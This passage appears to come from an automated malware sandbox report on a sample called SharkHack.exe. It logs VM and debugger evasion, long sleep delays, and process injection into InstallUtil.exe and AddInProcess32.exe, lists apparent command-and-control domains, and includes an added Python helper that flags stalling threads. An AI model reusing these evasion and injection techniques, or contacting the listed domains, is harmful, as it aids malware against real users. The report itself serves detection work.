                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          Source: Yara match; File source: Process Memory Space: SharkHack.exe PID: 6224, type: MEMORYSTR
                          Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 2476, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\SharkHack.exe; Section loaded: OutputDebugStringW count: 1941
                          Source: C:\Users\user\Desktop\SharkHack.exe; Memory allocated: 1F50000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\SharkHack.exe; Memory allocated: 3990000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\SharkHack.exe; Memory allocated: 5990000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\SharkHack.exe; Memory allocated: 9900000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\SharkHack.exe; Memory allocated: A900000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\SharkHack.exe; Memory allocated: AB00000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\SharkHack.exe; Memory allocated: BB00000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\SharkHack.exe; Memory allocated: BEF0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\SharkHack.exe; Memory allocated: CEF0000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 30E0000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 3310000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 3130000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 8620000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 9620000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 97E0000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: A7E0000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: AB60000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: BB60000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: CB60000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 2FF0000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 3210000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 3060000 memory reserve | memory write watch
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Thread delayed: delay time: 922337203685477 (4 occurrences)
                          Source: C:\Users\user\Desktop\SharkHack.exe; Window / User API: threadDelayed 2034
                          Source: C:\Users\user\Desktop\SharkHack.exe; Window / User API: threadDelayed 7821
                          Source: C:\Users\user\Desktop\SharkHack.exe TID: 6544; Thread sleep time: -2034000s >= -30000s
                          Source: C:\Users\user\Desktop\SharkHack.exe TID: 2668; Thread sleep time: -33000s >= -30000s
                          Source: C:\Users\user\Desktop\SharkHack.exe TID: 6544; Thread sleep time: -7821000s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6484; Thread sleep time: -71000s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6840; Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6436; Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1772; Thread sleep time: -30000s >= -30000s
                          Source: SharkHack.exe, 00000000.00000002.2881426397.0000000005E70000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2915403945.00000000044E3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2915403945.000000000443A000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: VBoxTray
                          Source: InstallUtil.exe, 00000007.00000002.2915403945.000000000443A000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 1220104579GSOFTWARE\VMware, Inc.\VMware VGAuth
                          Source: SharkHack.exe, 00000000.00000002.2875564569.0000000004C2D000.00000004.00000800.00020000.00000000.sdmp, SharkHack.exe, 00000000.00000002.2875564569.0000000004999000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2923724922.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Binary or memory string: edAXEpi8n3lHGfSJaBhF
                          Source: AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.2925272325.000000000144D000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe; API call chain: ExitProcess graph end node
                          Source: C:\Users\user\Desktop\SharkHack.exe; Process information queried: ProcessInformation
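The "Thread sleep time" lines above are the raw evidence behind the "Contains long sleeps" and "Tries to delay execution" signatures: the report compares each delay against a 30000 limit, and two of the InstallUtil.exe values are far beyond any real timer. The Python below is an editor's added example, not output of Joe Sandbox or code from the sample. It parses constructed copies of those lines, sums the delays per thread and flags the threads that would outlast a sandbox run. Treating 922337203685477 as the .NET TimeSpan.MaxValue sentinel (Int64.MaxValue ticks of 100 ns expressed in milliseconds) is the editor's interpretation and is marked as an assumption in the code.

```python
import re
from collections import defaultdict

# Constructed copies of the "Thread sleep time" lines in this section; values are the
# report's own (negative = relative interval, compared against the report's 30000 limit).
SLEEP_LINES = [
    "C:\\Users\\user\\Desktop\\SharkHack.exe TID: 6544; Thread sleep time: -2034000s >= -30000s",
    "C:\\Users\\user\\Desktop\\SharkHack.exe TID: 2668; Thread sleep time: -33000s >= -30000s",
    "C:\\Users\\user\\Desktop\\SharkHack.exe TID: 6544; Thread sleep time: -7821000s >= -30000s",
    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe TID: 6484; Thread sleep time: -71000s >= -30000s",
    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe TID: 6840; Thread sleep time: -1844674407370954s >= -30000s",
    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe TID: 6436; Thread sleep time: -922337203685477s >= -30000s",
    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe TID: 1772; Thread sleep time: -30000s >= -30000s",
]

# 922337203685477 == Int64.MaxValue 100 ns ticks expressed in milliseconds, i.e. .NET
# TimeSpan.MaxValue: a delay that never elapses. Editor's interpretation, an assumption.
INFINITE_SENTINEL = (2**63 - 1) // 10_000
DEFAULT_THRESHOLD = 30_000  # the limit the report itself compares each sleep against

LINE_RE = re.compile(
    r"^(?P<proc>.+?) TID: (?P<tid>\d+);?\s*Thread sleep time: (?P<sleep>-?\d+)s >= (?P<limit>-?\d+)s$"
)


def parse_sleep_lines(lines):
    """One record per matching line: process basename, thread id, delay magnitude, report limit."""
    records = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # lines in another shape (e.g. "Thread delayed: delay time: ...") are skipped
        records.append({
            "process": m["proc"].rsplit("\\", 1)[-1],
            "tid": int(m["tid"]),
            "sleep": abs(int(m["sleep"])),  # magnitude; the sign only marks a relative interval
            "limit": abs(int(m["limit"])),
        })
    return records


def summarize_threads(records, threshold=DEFAULT_THRESHOLD):
    """Per (process, tid): total and longest delay, call count, and two verdict flags."""
    per_thread = defaultdict(lambda: {"total": 0, "longest": 0, "calls": 0})
    for r in records:
        t = per_thread[(r["process"], r["tid"])]
        t["total"] += r["sleep"]
        t["longest"] = max(t["longest"], r["sleep"])
        t["calls"] += 1
    for t in per_thread.values():
        t["effectively_infinite"] = t["longest"] >= INFINITE_SENTINEL
        # ">=" mirrors the report's comparison, so a delay exactly at the limit is flagged too
        t["exceeds_threshold"] = t["total"] >= threshold
    return dict(per_thread)


def stalling_threads(records, threshold=DEFAULT_THRESHOLD):
    """Sorted (process, tid) keys whose cumulative delay outlasts the sandbox budget."""
    return sorted(k for k, v in summarize_threads(records, threshold).items() if v["exceeds_threshold"])


if __name__ == "__main__":
    for key, verdict in sorted(summarize_threads(parse_sleep_lines(SLEEP_LINES)).items()):
        print(key, verdict)
```

Summing per thread rather than looking at single calls is what catches the SharkHack.exe pattern: thread 6544 shows up twice, and the two "threadDelayed" counters (2034 and 7821) suggest the totals are built from many short sleeps, which a per-call threshold would miss.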

                          Anti Debugging

                          Source: C:\Users\user\Desktop\SharkHack.exe; Code function: 0_2_06020940 CheckRemoteDebuggerPresent
                          Source: C:\Users\user\Desktop\SharkHack.exe; Process queried: DebugPort (2 occurrences)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Process queried: DebugPort (4 occurrences)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe; Code function: 10_2_0043D910 LdrInitializeThunk
                          Source: C:\Users\user\Desktop\SharkHack.exe; Process token adjusted: Debug
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Process token adjusted: Debug (2 occurrences)
                          Source: C:\Users\user\Desktop\SharkHack.exe; Memory allocated: page read and write | page guard

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
Source: C:\Users\user\Desktop\SharkHack.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 700000 protect: page execute and read and write
Source: C:\Users\user\Desktop\SharkHack.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 900000 protect: page execute and read and write
Source: C:\Users\user\Desktop\SharkHack.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\SharkHack.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 700000 value starts with: 4D5A
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 900000 value starts with: 4D5A
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: InstallUtil.exe, 00000007.00000002.2903541486.0000000003761000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: cloudewahsj.shop
Source: InstallUtil.exe, 00000007.00000002.2903541486.0000000003761000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: rabidcowse.shop
Source: InstallUtil.exe, 00000007.00000002.2903541486.0000000003761000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: noisycuttej.shop
Source: InstallUtil.exe, 00000007.00000002.2903541486.0000000003761000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: tirepublicerj.shop
Source: InstallUtil.exe, 00000007.00000002.2903541486.0000000003761000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: framekgirus.shop
Source: InstallUtil.exe, 00000007.00000002.2903541486.0000000003761000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: wholersorie.shop
Source: InstallUtil.exe, 00000007.00000002.2903541486.0000000003761000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: abruptyopsn.shop
Source: InstallUtil.exe, 00000007.00000002.2903541486.0000000003761000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: nearycrepso.shop
Source: InstallUtil.exe, 00000007.00000002.2903541486.0000000003761000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: aliveindu.click
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 700000
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 702000
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7B6000
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7D8000
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 51D008
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 900000
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 902000
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 9B6000
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 9D8000
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7B3008
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 4B6000
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 4D8000
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 11FC008
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 5D6000
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 5D8000
Source: C:\Users\user\Desktop\SharkHack.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1069008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 442000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 445000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 453000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 11A5008
Source: C:\Users\user\Desktop\SharkHack.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\SharkHack.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\SharkHack.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\SharkHack.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 10_2_00438040 cpuid 10_2_00438040
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Users\user\Desktop\SharkHack.exe VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\SharkHack.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
